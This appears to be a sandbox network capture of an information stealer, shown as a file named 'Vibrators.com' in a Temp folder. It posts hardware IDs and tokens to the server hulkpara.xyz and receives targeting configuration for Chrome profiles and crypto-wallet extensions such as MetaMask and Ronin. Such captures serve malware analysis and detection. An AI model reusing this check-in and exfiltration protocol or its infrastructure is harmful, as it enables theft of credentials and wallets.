2024-12-18 20:08:42 UTC	12301	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49710	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:08:44 UTC	232	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:08:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:08:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:08:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49711	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:08:46 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----WT0R1DJWBSJM7YUKX47G User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:08:46 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 54 30 52 31 44 4a 57 42 53 4a 4d 37 59 55 4b 58 34 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 31 30 34 45 44 31 30 30 41 41 31 31 30 36 36 35 34 35 34 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 57 54 30 52 31 44 4a 57 42 53 4a 4d 37 59 55 4b 58 34 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 57 54 30 52 31 44 4a 57 42 53 4a 4d 37 59 55 4b 58 34 37 47 2d 2d 0d Data Ascii: ------WT0R1DJWBSJM7YUKX47GContent-Disposition: form-data; name="hwid"33104ED100AA1106654546-a33c7340-61ca------WT0R1DJWBSJM7YUKX47GContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WT0R1DJWBSJM7YUKX47G--
2024-12-18 20:08:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:08:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:08:47 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 7c 31 7c 31 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|7fa160eb3ea11fe2e6841813b93c798d\|1\|1\|1\|1\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49712	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:08:48 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----26XT0ZMGV3W4E3EUS2DT User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:08:48 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 36 58 54 30 5a 4d 47 56 33 57 34 45 33 45 55 53 32 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 54 30 5a 4d 47 56 33 57 34 45 33 45 55 53 32 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 54 30 5a 4d 47 56 33 57 34 45 33 45 55 53 32 44 54 0d 0a 43 6f 6e 74 Data Ascii: ------26XT0ZMGV3W4E3EUS2DTContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------26XT0ZMGV3W4E3EUS2DTContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------26XT0ZMGV3W4E3EUS2DTCont
2024-12-18 20:08:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:08:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:08:49 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49713	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:08:51 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----LXLNGVKNGVAIE3OZMO8Y User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:08:51 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 58 4c 4e 47 56 4b 4e 47 56 41 49 45 33 4f 5a 4d 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 4e 47 56 4b 4e 47 56 41 49 45 33 4f 5a 4d 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 4e 47 56 4b 4e 47 56 41 49 45 33 4f 5a 4d 4f 38 59 0d 0a 43 6f 6e 74 Data Ascii: ------LXLNGVKNGVAIE3OZMO8YContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------LXLNGVKNGVAIE3OZMO8YContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LXLNGVKNGVAIE3OZMO8YCont
2024-12-18 20:08:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:08:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:08:52 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49714	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:08:53 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----9HVSRI5X4OZM7YCTJWLF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:08:53 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 39 48 56 53 52 49 35 58 34 4f 5a 4d 37 59 43 54 4a 57 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 39 48 56 53 52 49 35 58 34 4f 5a 4d 37 59 43 54 4a 57 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 39 48 56 53 52 49 35 58 34 4f 5a 4d 37 59 43 54 4a 57 4c 46 0d 0a 43 6f 6e 74 Data Ascii: ------9HVSRI5X4OZM7YCTJWLFContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------9HVSRI5X4OZM7YCTJWLFContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------9HVSRI5X4OZM7YCTJWLFCont
2024-12-18 20:08:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:08:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:08:54 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49715	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:08:55 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 5869 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:08:55 UTC	5869	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 Data Ascii: ------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------1VSRIWTJM7G47Q90HLN7Cont
2024-12-18 20:08:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:08:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:08:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49716	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:08:56 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----WBI5PPHVAI58QQIWT2NO User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:08:56 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 42 49 35 50 50 48 56 41 49 35 38 51 51 49 57 54 32 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 57 42 49 35 50 50 48 56 41 49 35 38 51 51 49 57 54 32 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 57 42 49 35 50 50 48 56 41 49 35 38 51 51 49 57 54 32 4e 4f 0d 0a 43 6f 6e 74 Data Ascii: ------WBI5PPHVAI58QQIWT2NOContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------WBI5PPHVAI58QQIWT2NOContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WBI5PPHVAI58QQIWT2NOCont
2024-12-18 20:08:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:08:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:08:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49722	142.250.181.132	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:02 UTC	603	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIk6HLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-18 20:09:03 UTC	1266	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 20:09:03 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-DUVstQnRcMlobypduLYKMw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-18 20:09:03 UTC	124	IN	Data Raw: 33 34 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 68 65 6c 6c 64 69 76 65 72 73 20 6b 69 6c 6c 7a 6f 6e 65 20 63 72 6f 73 73 6f 76 65 72 22 2c 22 61 6e 74 68 6f 6e 79 20 73 61 6e 74 61 6e 64 65 72 20 79 61 6e 6b 65 65 73 22 2c 22 68 6f 6e 64 61 20 6e 69 73 73 61 6e 20 6d 65 72 67 65 72 20 74 61 6c 6b 73 22 2c 22 65 61 72 74 68 71 75 61 6b 65 20 70 6f 72 74 20 76 69 6c 61 Data Ascii: 348)]}'["",["helldivers killzone crossover","anthony santander yankees","honda nissan merger talks","earthquake port vila
2024-12-18 20:09:03 UTC	723	IN	Data Raw: 20 76 61 6e 75 61 74 75 22 2c 22 73 6f 74 6f 20 66 69 72 65 20 6a 75 72 75 70 61 20 76 61 6c 6c 65 79 22 2c 22 6e 61 74 69 6f 6e 61 6c 20 66 69 6c 6d 20 72 65 67 69 73 74 72 79 20 6d 6f 76 69 65 73 22 2c 22 70 6f 65 20 32 20 70 61 74 63 68 20 6e 6f 74 65 73 22 2c 22 68 6f 6c 69 64 61 79 20 62 61 6b 69 6e 67 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 20 73 65 61 73 6f 6e 20 31 31 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 Data Ascii: vanuatu","soto fire jurupa valley","national film registry movies","poe 2 patch notes","holiday baking championship season 11"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2Vhc
2024-12-18 20:09:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49724	142.250.181.132	443	1796	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:03 UTC	506	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIk6HLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-18 20:09:03 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 18 Dec 2024 20:09:03 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-18 20:09:03 UTC	372	IN	Data Raw: 32 39 37 39 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 